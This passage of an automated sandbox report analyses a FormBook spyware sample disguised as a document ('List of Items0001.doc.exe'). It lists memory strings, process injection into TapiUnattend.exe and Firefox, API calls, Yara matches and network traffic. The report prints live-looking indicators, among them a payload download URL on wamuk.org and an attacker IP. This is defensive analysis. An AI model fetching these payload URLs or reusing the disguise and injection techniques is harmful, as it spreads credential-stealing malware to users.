        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000009.00000000.677565828265.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.000000001050C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.coms
        Source: explorer.exe, 00000009.00000002.678916040962.00000000105C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566217210.00000000105C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.partner.microsoftonline.cn/RESPQS
        Source: TapiUnattend.exe, 00000005.00000003.674393739894.000000000829A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
        Source: TapiUnattend.exe, 00000005.00000003.674394972901.00000000032D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: TapiUnattend.exe, 00000005.00000002.677674890216.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674394972901.00000000032D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.000000000548A000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678980575315.000000001614A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVH
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.0000000002317000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674221164354.0000000031A80000.00000004.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/css/NxTelX253.bin
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/css/NxTelX253.bine
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/f
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/j
        Source: explorer.exe, 00000009.00000002.678915471542.000000001040B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565765377.000000001040B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: explorer.exe, 00000009.00000000.677567218626.0000000010806000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678917477894.0000000010806000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/y
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownHTTPS traffic detected: 162.213.195.46:443 -> 192.168.11.30:49892 version: TLS 1.2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A34E0 NtCreateMutant,LdrInitializeThunk,3_2_326A34E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_326A2B90
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_326A2D10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A4260 NtSetContextThread,3_2_326A4260
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A4570 NtSuspendThread,3_2_326A4570
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2A10 NtWriteFile,3_2_326A2A10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2AC0 NtEnumerateValueKey,3_2_326A2AC0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2AA0 NtQueryInformationFile,3_2_326A2AA0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2A80 NtClose,3_2_326A2A80
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B20 NtQueryInformationProcess,3_2_326A2B20
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B00 NtQueryValueKey,3_2_326A2B00
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B10 NtAllocateVirtualMemory,3_2_326A2B10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2BE0 NtQueryVirtualMemory,3_2_326A2BE0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2BC0 NtQueryInformationToken,3_2_326A2BC0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B80 NtCreateKey,3_2_326A2B80
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A38D0 NtGetContextThread,3_2_326A38D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00406D5F0_2_00406D5F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB61BFF0_2_6DB61BFF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326322453_2_32632245
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272124C3_2_3272124C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265D2EC3_2_3265D2EC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272F3303_2_3272F330
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267E3103_2_3267E310
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326613803_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271E0763_2_3271E076
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327270F13_2_327270F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267B0D03_2_3267B0D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326600A03_2_326600A0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A508C3_2_326A508C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326B717A3_2_326B717A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D1303_2_3270D130
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F1133_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273010E3_2_3273010E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E03_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C03_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326946703_2_32694670
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271D6463_2_3271D646
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270D62C3_2_3270D62C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268C6003_2_3268C600
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E36EC3_2_326E36EC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272F6F63_2_3272F6F6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272A6C03_2_3272A6C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326706803_2_32670680
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326727603_2_32672760
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267A7603_2_3267A760
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327267573_2_32726757
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326704453_2_32670445
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273A5263_2_3273A526
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327275C63_2_327275C6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272F5C93_2_3272F5C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272EA5B3_2_3272EA5B
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272CA133_2_3272CA13
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268FAA03_2_3268FAA0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272FA893_2_3272FA89
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272FB2E3_2_3272FB2E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326ADB193_2_326ADB19
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32670B103_2_32670B10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E4BC03_2_326E4BC0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3272F8723_2_3272F872
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326568683_2_32656868
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326798703_2_32679870
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B8703_2_3268B870
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327108353_2_32710835
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326738003_2_32673800
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E8103_2_3269E810
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327278F33_2_327278F3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326728C03_2_326728C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327218DA3_2_327218DA
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E98B23_2_326E98B2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326868823_2_32686882
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03935E834_2_03935E83
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039403DF4_2_039403DF
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03956ABF4_2_03956ABF
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03935ECF4_2_03935ECF
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03935ECC4_2_03935ECC
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03937E4F4_2_03937E4F
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393E5BF4_2_0393E5BF
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03937C2F4_2_03937C2F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326DE692 appears 59 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326EEF10 appears 62 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326B7BE4 appears 66 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 3265B910 appears 185 times
        Source: List of Items0001.doc.exeStatic PE information: invalid certificate
        Source: List of Items0001.doc.exe, 00000000.00000000.673783784429.0000000000451000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000003.674118248862.00000000325B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000000.673958791805.0000000000451000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000003.674114276384.0000000032403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTapiUnattend.exej% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002395000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTapiUnattend.exej% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032900000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exeBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/12@22/13
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Users\user\AppData\Local\Temp\nsvAFA7.tmpJump to behavior
        Source: List of Items0001.doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: List of Items0001.doc.exeVirustotal: Detection: 9%
        Source: List of Items0001.doc.exeReversingLabs: Detection: 13%
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile read: C:\Users\user\Desktop\List of Items0001.doc.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: propsys.dllJump to behavior
